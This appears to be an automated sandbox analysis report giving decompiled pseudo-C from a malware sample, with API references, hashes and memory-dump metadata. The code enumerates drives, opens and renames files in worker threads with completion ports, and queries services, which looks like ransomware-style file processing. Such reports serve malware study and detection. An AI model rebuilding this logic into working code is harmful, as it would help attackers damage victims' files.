					 *((intOrPtr*)(_t161 + 0x14)) = 0xb78b4057;
					 *((intOrPtr*)(_t161 + 0x18)) = 0xb793407b;
					 *((intOrPtr*)(_t161 + 0x1c)) = 0xb7854048;
					 *((intOrPtr*)(_t161 + 0x20)) = 0xb7b54016;
					 *((intOrPtr*)(_t161 + 0x24)) = 0xb7c1407c;
					 *((intOrPtr*)(_t161 + 0x28)) = 0xb7d9401f;
					 *((intOrPtr*)(_t161 + 0x2c)) = 0xb7db404b;
					 *((intOrPtr*)(_t161 + 0x30)) = 0xb7fc4038;
					E00D01250(_t161, _t161, 0xd);
					_t166 =  *0xd25758( &_v80, 0, 1,  &_v96,  &_v12); // executed
					if(_t166 == 0) {
						_t170 =  *0xd25758( &_v112, 0, 1,  &_v128,  &_v16); // executed
						if(_t170 == 0) {
							E00D06E1C(0xffffffff,  &_v8);
							if(_v8 == 0) {
								L9:
								_push( &_v20);
								_push(_v16);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push( &_v152);
								_push(_v12);
								if( *((intOrPtr*)( *_v12 + 0xc))() == 0) {
									_t176 =  *0xd25760(_v20, 0xa, 0, 0, 3, 3, 0, 0); // executed
									if(_t176 == 0) {
										_push( &_v24);
										_push(0);
										_push(0x30);
										_push( &_v284);
										_push( &_v160);
										_push(_v20);
										if( *((intOrPtr*)( *_v20 + 0x50))() == 0) {
											while(1) {
												_v28 = 0;
												_v32 = 0;
												_push( &_v32);
												_push( &_v28);
												_push(1);
												_push(0xffffffff);
												_push(_v24);
												if( *((intOrPtr*)( *_v24 + 0x10))() != 0) {
													break;
												}
												 *0xd257a0( &_v48);
												_push(0);
												_push(0);
												_push( &_v48);
												_push(0);
												_push( &_v168);
												_push(_v28);
												if( *((intOrPtr*)( *_v28 + 0x10))() == 0) {
													 *0xd25464( &_v460,  &_v220, _v40);
													_t231 = _t231 + 0xc;
													 *((intOrPtr*)( *_v20 + 0x40))(_v20,  &_v460, 0, 0, 0);
													 *0xd257a4( &_v48);
												}
												 *((intOrPtr*)( *_v28 + 8))(_v28);
											}
											L20:
											if(_v24 != 0) {
												 *((intOrPtr*)( *_v24 + 8))(_v24);
											}
											if(_v20 != 0) {
												 *((intOrPtr*)( *_v20 + 8))(_v20);
											}
											if(_v16 != 0) {
												 *((intOrPtr*)( *_v16 + 8))(_v16);
											}
											if(_v12 != 0) {
												 *((intOrPtr*)( *_v12 + 8))(_v12);
											}
											_t197 =  *0xd2574c(); // executed
											return _t197;
										}
										goto L20;
									}
									goto L20;
								}
								goto L20;
							}
							 *0xd257a0( &_v64);
							_v64 = 3;
							_v56 = 0x40;
							_push( &_v64);
							_push(0);
							_push( &_v332);
							_push(_v16);
							if( *((intOrPtr*)( *_v16 + 0x20))() == 0) {
								 *0xd257a4( &_v64);
								goto L9;
							}
							goto L20;
						}
						goto L20;
					}
					goto L20;
				}
				return _t142;
			}









































                  0x00d07805
                  0x00d0780c
                  0x00d07813
                  0x00d0781a
                  0x00d07823
                  0x00d0782b
                  0x00d07831
                  0x00d07834
                  0x00d0783a
                  0x00d07841
                  0x00d07848
                  0x00d07852
                  0x00d07857
                  0x00d0785a
                  0x00d07860
                  0x00d07867
                  0x00d0786e
                  0x00d07878
                  0x00d0787d
                  0x00d07880
                  0x00d07886
                  0x00d0788d
                  0x00d07894
                  0x00d0789e
                  0x00d078a3
                  0x00d078a6
                  0x00d078ac
                  0x00d078b3
                  0x00d078ba
                  0x00d078c4
                  0x00d078c9
                  0x00d078cf
                  0x00d078d5
                  0x00d078dc
                  0x00d078e3
                  0x00d078ea
                  0x00d078f1
                  0x00d078f8
                  0x00d078ff
                  0x00d07906
                  0x00d0790d
                  0x00d07914
                  0x00d0791b
                  0x00d07925
                  0x00d0792a
                  0x00d07930
                  0x00d07936
                  0x00d0793d
                  0x00d07944
                  0x00d0794b
                  0x00d07952
                  0x00d0795c
                  0x00d07961
                  0x00d07967
                  0x00d0796d
                  0x00d07977
                  0x00d0797c
                  0x00d07982
                  0x00d07988
                  0x00d0798f
                  0x00d07996
                  0x00d0799d
                  0x00d079a4
                  0x00d079ab
                  0x00d079b2
                  0x00d079b9
                  0x00d079c0
                  0x00d079c7
                  0x00d079ce
                  0x00d079d5
                  0x00d079dc
                  0x00d079e3
                  0x00d079ea
                  0x00d079f4
                  0x00d079f9
                  0x00d079ff
                  0x00d07a05
                  0x00d07a0f
                  0x00d07a14
                  0x00d07a1a
                  0x00d07a20
                  0x00d07a27
                  0x00d07a2e
                  0x00d07a35
                  0x00d07a3c
                  0x00d07a43
                  0x00d07a4a
                  0x00d07a51
                  0x00d07a58
                  0x00d07a5f
                  0x00d07a66
                  0x00d07a6d
                  0x00d07a77
                  0x00d07a8c
                  0x00d07a94
                  0x00d07aab
                  0x00d07ab3
                  0x00d07ac0
                  0x00d07ac9
                  0x00d07b0e
                  0x00d07b16
                  0x00d07b17
                  0x00d07b1a
                  0x00d07b1c
                  0x00d07b1e
                  0x00d07b20
                  0x00d07b22
                  0x00d07b2a
                  0x00d07b2b
                  0x00d07b33
                  0x00d07b4b
                  0x00d07b53
                  0x00d07b62
                  0x00d07b63
                  0x00d07b65
                  0x00d07b6d
                  0x00d07b74
                  0x00d07b75
                  0x00d07b7d
                  0x00d07b84
                  0x00d07b84
                  0x00d07b8b
                  0x00d07b9a
                  0x00d07b9e
                  0x00d07b9f
                  0x00d07ba1
                  0x00d07ba3
                  0x00d07bab
                  0x00000000
                  0x00000000
                  0x00d07bb3
                  0x00d07bbe
                  0x00d07bc0
                  0x00d07bc5
                  0x00d07bc6
                  0x00d07bce
                  0x00d07bcf
                  0x00d07bd7
                  0x00d07bea
                  0x00d07bf0
                  0x00d07c08
                  0x00d07c0f
                  0x00d07c0f
                  0x00d07c1d
                  0x00d07c1d
                  0x00d07c25
                  0x00d07c29
                  0x00d07c33
                  0x00d07c33
                  0x00d07c3a
                  0x00d07c44
                  0x00d07c44
                  0x00d07c4b
                  0x00d07c55
                  0x00d07c55
                  0x00d07c5c
                  0x00d07c66
                  0x00d07c66
                  0x00d07c69
                  0x00000000
                  0x00d07c69
                  0x00000000
                  0x00d07b7f
                  0x00000000
                  0x00d07b55
                  0x00000000
                  0x00d07b35
                  0x00d07acf
                  0x00d07ad5
                  0x00d07adc
                  0x00d07aeb
                  0x00d07aec
                  0x00d07af4
                  0x00d07af5
                  0x00d07afd
                  0x00d07b08
                  0x00000000
                  0x00d07b08
                  0x00000000
                  0x00d07aff
                  0x00000000
                  0x00d07ab5
                  0x00000000
                  0x00d07a96
                  0x00d07c72

                  APIs
                  • CoInitialize.OLE32(00000000), ref: 00D07823
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Initialize
                  • String ID: @
                  • API String ID: 2538663250-2766056989
                  • Opcode ID: 8cd2a46464dd818271d907df1e601bd8fe983455b5ecba728d3235010dbecf0d
                  • Instruction ID: 8376e528170c20b005c0a99da81419753a18470e96377a66b36eb11f42b9ff9b
                  • Opcode Fuzzy Hash: 8cd2a46464dd818271d907df1e601bd8fe983455b5ecba728d3235010dbecf0d
                  • Instruction Fuzzy Hash: 1CD147B0940209EFEB10EF90D889F9ABB78FF15304F158994E519AF2A1C771DA85CF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D10B40 Relevance: 3.2, APIs: 2, Instructions: 184COMMON
                  Download Yara Rule
                  C-Code - Quality: 52%
                  			E00D10B40() {
				void* _v8;
				signed int _v12;
				struct _SECURITY_ATTRIBUTES* _v16;
				void* _v20;
				unsigned int _v24;
				unsigned int _v28;
				unsigned int _v32;
				void* _v36;
				signed int _t61;
				unsigned int _t64;
				struct _SECURITY_ATTRIBUTES* _t68;
				void* _t69;
				void* _t72;
				signed int _t73;
				unsigned int _t75;
				unsigned int _t80;
				signed int _t81;
				unsigned int _t82;
				unsigned int _t83;
				unsigned int _t89;
				void* _t91;

				_v24 = 0;
				_v36 = E00D01564();
				_t61 = E00D0A458( *0xd2516c, 0, 0); // executed
				_t79 = _t61;
				if(_t61 != 0) {
					_v24 = E00D06830(_t79 * 2);
					__eflags = _v24;
					if(_v24 != 0) {
						_t64 = E00D0A458( *0xd2516c, _t79, _v24); // executed
						_t80 = _t64;
						__eflags = _t80;
						if(_t80 != 0) {
							_t81 = _t80 >> 2;
							_v28 = E00D06830(_t81 * 4);
							__eflags = _v28;
							if(_v28 != 0) {
								_t68 = E00D06830(_t81 * 4);
								_v32 = _t68;
								__eflags = _v32;
								if(_v32 != 0) {
									 *0xd25884 = 0;
									 *0xd25888 = 0;
									 *0xd2588c = 0;
									_v12 = 0;
									_v16 = 0;
									_t91 = _v24;
									_t89 = _v28;
									do {
										_t69 = E00D0A190( *0xd2516c, _t91); // executed
										__eflags = _t69 - 3;
										if(_t69 == 3) {
											L13:
											_v20 = E00D0694C(_t91);
											_t69 = CreateThread(0, 0, E00D0F264, _v20, 0, 0); // executed
											__eflags = _t69;
											if(_t69 == 0) {
												L16:
												goto L22;
											}
											L14:
											 *(_t89 + _v12 * 4) = _t69;
											_v12 = _v12 + 1;
											_v16 =  &(_v16->nLength);
											_t69 = _v36;
											__eflags = _v16 - _t69;
											if(_v16 == _t69) {
												_t73 =  *0xd2554c(_v16, _v28, 0, 0xffffffff);
												_v12 = _t73;
												 *(_t89 + _t73 * 4) = 0;
												_t69 =  *0xd254d0( *(_t89 + _t73 * 4));
												_t35 =  &_v16;
												 *_t35 = _v16 - 1;
												__eflags =  *_t35;
											}
											goto L16;
										}
										__eflags = _t69 - 2;
										if(_t69 != 2) {
											__eflags = _t69 - 4;
											if(_t69 != 4) {
												goto L22;
											}
											_v20 = E00D0694C(_t91);
											_t69 =  *0xd2551c(0, 0, E00D0F264, _v20, 4, 0);
											_v8 = _t69;
											__eflags = _v8;
											if(_v8 == 0) {
												goto L22;
											}
											_t75 = E00D0B390( *0xd2516c, _v8);
											__eflags = _t75;
											if(_t75 != 0) {
												 *0xd25524(_v8);
												_t69 = _v8;
												goto L14;
											}
											 *0xd254cc(_v8, 0);
											_t69 =  *0xd254d0(_v8);
											goto L22;
										}
										goto L13;
										L22:
										_t91 = _t91 + 8;
										_t81 = _t81 - 1;
										__eflags = _t81;
									} while (_t81 != 0);
									__eflags = _v16;
									if(__eflags == 0) {
										while(1) {
											L30:
											_t68 =  *0xd25884; // 0x21e
											asm("lock cmpxchg [ecx], edx");
											if(__eflags == 0) {
												break;
											}
											Sleep(0x64); // executed
										}
										L33:
										if(_v32 != 0) {
											_t68 = E00D0684C(_v32);
										}
										if(_v28 != 0) {
											_t68 = E00D0684C(_v28);
										}
										if(_v24 == 0) {
											return _t68;
										} else {
											return E00D0684C(_v24);
										}
									}
									_t82 = _v16;
									do {
										asm("lodsd");
										__eflags = _t69;
										if(_t69 != 0) {
											asm("stosd");
											_t82 = _t82 - 1;
											__eflags = _t82;
										}
										__eflags = _t82;
									} while (_t82 != 0);
									_t72 =  *0xd2554c(_v16, _v32, 1, 0xffffffff);
									_t83 = _v16;
									do {
										asm("lodsd");
										_t72 =  *0xd254d0(_t72);
										_t83 = _t83 - 1;
										__eflags = _t83;
									} while (__eflags != 0);
									goto L30;
								}
								goto L33;
							}
							goto L33;
						}
						goto L33;
					}
					goto L33;
				}
				goto L33;
			}
























                  0x00d10b4d
                  0x00d10b55
                  0x00d10b62
                  0x00d10b67
                  0x00d10b6b
                  0x00d10b7f
                  0x00d10b82
                  0x00d10b86
                  0x00d10b97
                  0x00d10b9c
                  0x00d10b9e
                  0x00d10ba0
                  0x00d10ba7
                  0x00d10bb7
                  0x00d10bba
                  0x00d10bbe
                  0x00d10bcd
                  0x00d10bd2
                  0x00d10bd5
                  0x00d10bd9
                  0x00d10be0
                  0x00d10bea
                  0x00d10bf4
                  0x00d10bfe
                  0x00d10c05
                  0x00d10c0c
                  0x00d10c0f
                  0x00d10c12
                  0x00d10c19
                  0x00d10c1e
                  0x00d10c21
                  0x00d10c28
                  0x00d10c2e
                  0x00d10c41
                  0x00d10c47
                  0x00d10c49
                  0x00d10c88
                  0x00000000
                  0x00d10c88
                  0x00d10c4b
                  0x00d10c51
                  0x00d10c53
                  0x00d10c56
                  0x00d10c59
                  0x00d10c5c
                  0x00d10c5f
                  0x00d10c6b
                  0x00d10c71
                  0x00d10c77
                  0x00d10c7f
                  0x00d10c85
                  0x00d10c85
                  0x00d10c85
                  0x00d10c85
                  0x00000000
                  0x00d10c5f
                  0x00d10c23
                  0x00d10c26
                  0x00d10c8a
                  0x00d10c8d
                  0x00000000
                  0x00000000
                  0x00d10c95
                  0x00d10ca8
                  0x00d10cae
                  0x00d10cb1
                  0x00d10cb5
                  0x00000000
                  0x00000000
                  0x00d10cc0
                  0x00d10cc5
                  0x00d10cc7
                  0x00d10ce2
                  0x00d10ce8
                  0x00000000
                  0x00d10ce8
                  0x00d10cce
                  0x00d10cd7
                  0x00000000
                  0x00d10cd7
                  0x00000000
                  0x00d10cf0
                  0x00d10cf0
                  0x00d10cf3
                  0x00d10cf4
                  0x00d10cf4
                  0x00d10cfc
                  0x00d10d00
                  0x00d10d39
                  0x00d10d39
                  0x00d10d3f
                  0x00d10d46
                  0x00d10d4a
                  0x00000000
                  0x00000000
                  0x00d10d50
                  0x00d10d50
                  0x00d10d58
                  0x00d10d5c
                  0x00d10d61
                  0x00d10d61
                  0x00d10d6a
                  0x00d10d6f
                  0x00d10d6f
                  0x00d10d78
                  0x00d10d8a
                  0x00d10d7a
                  0x00000000
                  0x00d10d7d
                  0x00d10d78
                  0x00d10d02
                  0x00d10d0b
                  0x00d10d0b
                  0x00d10d0c
                  0x00d10d0e
                  0x00d10d10
                  0x00d10d11
                  0x00d10d11
                  0x00d10d11
                  0x00d10d12
                  0x00d10d12
                  0x00d10d20
                  0x00d10d26
                  0x00d10d2c
                  0x00d10d2c
                  0x00d10d2e
                  0x00d10d34
                  0x00d10d35
                  0x00d10d35
                  0x00000000
                  0x00d10d2c
                  0x00000000
                  0x00d10bdb
                  0x00000000
                  0x00d10bc0
                  0x00000000
                  0x00d10ba2
                  0x00000000
                  0x00d10b88
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: 77dab3110d02a978309f7cbb1e3b0c8e07fd403cd777fc9b02cbe3539322ab95
                  • Instruction ID: f8a64c2af12272029f1596905ed843d4261446994f041148dc97abfe556214bd
                  • Opcode Fuzzy Hash: 77dab3110d02a978309f7cbb1e3b0c8e07fd403cd777fc9b02cbe3539322ab95
                  • Instruction Fuzzy Hash: 26614A70900309FADF21AF90FC45BEEBB75EB14315F244125E505A62A0DBB1AA91DFB1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D08D78 Relevance: 3.1, APIs: 2, Instructions: 78serviceCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D097A8: NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400), ref: 00D097D5
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001,25DD2DA4), ref: 00D08DB6
                  • OpenServiceW.ADVAPI32(00000000,?,00000014), ref: 00D08E24
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Open$InformationManagerQueryServiceSystem
                  • String ID:
                  • API String ID: 83516719-0
                  • Opcode ID: 89c73f6e6f177a4eda5b6a392696491e38d9d5d3931fde080ef8e149cfd4e0ca
                  • Instruction ID: 62a996035cf98f269a9f94c4bab6455438a15423d89d45e335c9a310cc31dc1a
                  • Opcode Fuzzy Hash: 89c73f6e6f177a4eda5b6a392696491e38d9d5d3931fde080ef8e149cfd4e0ca
                  • Instruction Fuzzy Hash: 1E312D70914208EFDB20CF94D908B9DBBB4FB04305F558194F185AB2E0D7B18E54DF61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0E308 Relevance: 3.1, APIs: 2, Instructions: 58fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00D0E308(WCHAR* _a4) {
				long _v8;
				long _v12;
				void* _v16;
				void* _t16;
				void* _t20;

				_v12 = 0;
				_v8 = 0;
				while(1) {
					SetFileAttributesW(_a4, 0x80); // executed
					_t16 = CreateFileW(_a4, 0x40000000, 0, 0, 3, 0, 0); // executed
					_v16 = _t16;
					if(_t16 != 0xffffffff) {
						break;
					}
					if( *[fs:0x34] != 0x20) {
						if( *[fs:0x34] != 5) {
							goto L11;
						} else {
							if(_v8 == 0) {
								E00D07260(_a4);
								_v8 = _v8 + 1;
								continue;
							}
						}
					} else {
						_t20 = E00D0DDA4(_a4); // executed
						if(_t20 != 0) {
							continue;
						}
					}
					L13:
					if(_v16 != 0xffffffff) {
						 *0xd254d0(_v16);
					}
					return _v12;
				}
				_v12 = 1;
				goto L13;
			}








                  0x00d0e313
                  0x00d0e31a
                  0x00d0e321
                  0x00d0e329
                  0x00d0e341
                  0x00d0e347
                  0x00d0e34d
                  0x00000000
                  0x00000000
                  0x00d0e357
                  0x00d0e371
                  0x00000000
                  0x00d0e373
                  0x00d0e377
                  0x00d0e37c
                  0x00d0e381
                  0x00000000
                  0x00d0e388
                  0x00d0e377
                  0x00d0e359
                  0x00d0e35c
                  0x00d0e363
                  0x00000000
                  0x00d0e365
                  0x00d0e363
                  0x00d0e399
                  0x00d0e39d
                  0x00d0e3a2
                  0x00d0e3a2
                  0x00d0e3b3
                  0x00d0e3b3
                  0x00d0e38e
                  0x00000000

                  APIs
                  • SetFileAttributesW.KERNELBASE(00000000,00000080,?,00000000,?,?,?), ref: 00D0E329
                  • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?,?,?), ref: 00D0E341
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$AttributesCreate
                  • String ID:
                  • API String ID: 415043291-0
                  • Opcode ID: f4441101998d27b075ec6bcd971e55a3027babb0ad01bded5f183f64d1824859
                  • Instruction ID: aaab3dbf201af53b47f4e428239068e26d55f14d8c0c69b806e76a7d838dadaa
                  • Opcode Fuzzy Hash: f4441101998d27b075ec6bcd971e55a3027babb0ad01bded5f183f64d1824859
                  • Instruction Fuzzy Hash: 3611A330904308FAEB305F91DD05BAC7F74EB40723F24862AF559A61E0C3B19A81DA71
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0EF8E Relevance: 3.0, APIs: 2, Instructions: 36fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 32%
                  			E00D0EF8E() {
				int _t29;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t52;
				void* _t55;

				while(1) {
					_t29 = MoveFileExW( *(_t55 + 8),  *(_t55 - 0xc), 8); // executed
					if(_t29 != 0) {
						break;
					}
					if( *[fs:0x34] != 0xb7) {
						E00D0684C( *(_t55 - 0xc));
						 *(_t55 - 0xc) = 0;
						break;
					}
					E00D0684C( *(_t55 - 0xc));
					 *(_t55 - 0xc) = 0;
					 *(_t55 - 0xc) = E00D0EC40( *(_t55 + 8),  *0xd25178);
					if( *(_t55 - 0xc) != 0) {
						continue;
					}
					break;
				}
				if( *(_t55 - 0xc) != 0) {
					_t34 = CreateFileW( *(_t55 - 0xc), 0xc0000000, 0, 0, 3, 0x40000000, 0); // executed
					 *(_t55 - 8) = _t34;
					if( *(_t55 - 8) != 0xffffffff) {
						_t36 = E00D0EC8C( *0xd25770( *(_t55 + 8)),  *((intOrPtr*)(_t55 + 0xc)),  *((intOrPtr*)(_t55 + 0x10))); // executed
						_t52 = _t36;
						if(_t52 != 0) {
							_t37 = CreateIoCompletionPort( *(_t55 - 8),  *0xd25880, 0, 0); // executed
							if(_t37 != 0) {
								 *_t21 =  *(_t55 - 8);
								 *(_t52 + 0x28) = 0;
								_push(_t52);
								_push(0);
								_push(0);
								_push( *0xd25880);
								if( *0xd25558() != 0) {
									 *0xd2555c(0xd2588c);
									 *0xd2555c(0xd25884);
									 *((intOrPtr*)(_t55 - 4)) = 1;
								} else {
									 *0xd25428(_t52, 0, 0x398);
									E00D0684C(_t52);
									 *0xd254d0( *(_t55 - 8));
								}
							} else {
								 *0xd25428(_t52, 0, 0x398);
								E00D0684C(_t52);
								 *0xd254d0( *(_t55 - 8));
							}
						} else {
							 *0xd254d0( *(_t55 - 8));
						}
					}
				}
				if( *(_t55 - 0xc) != 0) {
					E00D0684C( *(_t55 - 0xc));
				}
				E00D0684C( *(_t55 + 8));
				return  *((intOrPtr*)(_t55 - 4));
			}









                  0x00d0ef43
                  0x00d0ef4b
                  0x00d0ef53
                  0x00d0ef55
                  0x00d0ef55
                  0x00d0ef62
                  0x00d0ef93
                  0x00d0ef98
                  0x00000000
                  0x00d0ef98
                  0x00d0ef67
                  0x00d0ef6c
                  0x00d0ef81
                  0x00d0ef88
                  0x00000000
                  0x00d0ef8c
                  0x00000000
                  0x00d0ef8a
                  0x00d0efa7
                  0x00d0efc2
                  0x00d0efc8
                  0x00d0efcf
                  0x00d0efe6
                  0x00d0efeb
                  0x00d0efef
                  0x00d0f00c
                  0x00d0f014
                  0x00d0f03b
                  0x00d0f03e
                  0x00d0f047
                  0x00d0f048
                  0x00d0f04a
                  0x00d0f04c
                  0x00d0f05a
                  0x00d0f083
                  0x00d0f08e
                  0x00d0f094
                  0x00d0f05c
                  0x00d0f064
                  0x00d0f06e
                  0x00d0f076
                  0x00d0f076
                  0x00d0f016
                  0x00d0f01e
                  0x00d0f028
                  0x00d0f030
                  0x00d0f030
                  0x00d0eff1
                  0x00d0eff4
                  0x00d0eff4
                  0x00d0efef
                  0x00d0efcf
                  0x00d0f09f
                  0x00d0f0a4
                  0x00d0f0a4
                  0x00d0f0ac
                  0x00d0f0ba

                  APIs
                  • MoveFileExW.KERNELBASE(00000000,00000000,00000008,00000000,00000000,00000000,00000000,?,00000000,?), ref: 00D0EF4B
                  • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000003,40000000,00000000,00000000,?,00000000,?), ref: 00D0EFC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CreateMove
                  • String ID:
                  • API String ID: 3198096935-0
                  • Opcode ID: 58aca284cd4da9328be32ebf8acd9277ccc5c6495f087d0cc17ac15abebb0c96
                  • Instruction ID: 2b5d9bf787b7a751039cf17bf10a35a891a56201d3f167bb60f323243f731ce3
                  • Opcode Fuzzy Hash: 58aca284cd4da9328be32ebf8acd9277ccc5c6495f087d0cc17ac15abebb0c96
                  • Instruction Fuzzy Hash: F7F06D71A04208FADF315FA4EC05BDCBF31EF44321F348162B619A40E0C3718A50EB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D07438 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00D07438() {
				short _v524;
				int _t5;
				unsigned int _t6;
				unsigned int _t7;
				WCHAR* _t8;

				_t5 = GetLogicalDriveStringsW(0x104,  &_v524); // executed
				_t6 = _t5;
				if(_t6 != 0) {
					_t7 = _t6 >> 2;
					_t8 =  &_v524;
					do {
						_t5 = GetDriveTypeW(_t8); // executed
						if(_t5 == 3 || _t5 == 2) {
							_t5 = E00D0748C(_t8); // executed
						}
						_t8 =  &(_t8[4]);
						_t7 = _t7 - 1;
					} while (_t7 != 0);
				}
				return _t5;
			}








                  0x00d0744f
                  0x00d07455
                  0x00d07459
                  0x00d0745b
                  0x00d0745e
                  0x00d07464
                  0x00d07465
                  0x00d0746e
                  0x00d07476
                  0x00d07476
                  0x00d0747b
                  0x00d0747e
                  0x00d0747f
                  0x00d07464
                  0x00d07488

                  APIs
                  • GetLogicalDriveStringsW.KERNELBASE(00000104,?), ref: 00D0744F
                  • GetDriveTypeW.KERNELBASE(?), ref: 00D07465
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Drive$LogicalStringsType
                  • String ID:
                  • API String ID: 1630765265-0
                  • Opcode ID: b0af018c960e1b2833b443aeabd9ca108012e09887b415b5aa31efa6963b317c
                  • Instruction ID: e07475338f4690ed5d045a53a71b995340ea1bf2f192d300831b5de6ce1ba338
                  • Opcode Fuzzy Hash: b0af018c960e1b2833b443aeabd9ca108012e09887b415b5aa31efa6963b317c
                  • Instruction Fuzzy Hash: 81E0E53290471957CB30AA946CC5AEB775CDB11300F080290EA48D6181CB60FD86C6B1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0E38C Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00D0E38C() {
				void* _t14;
				void* _t18;
				void* _t24;

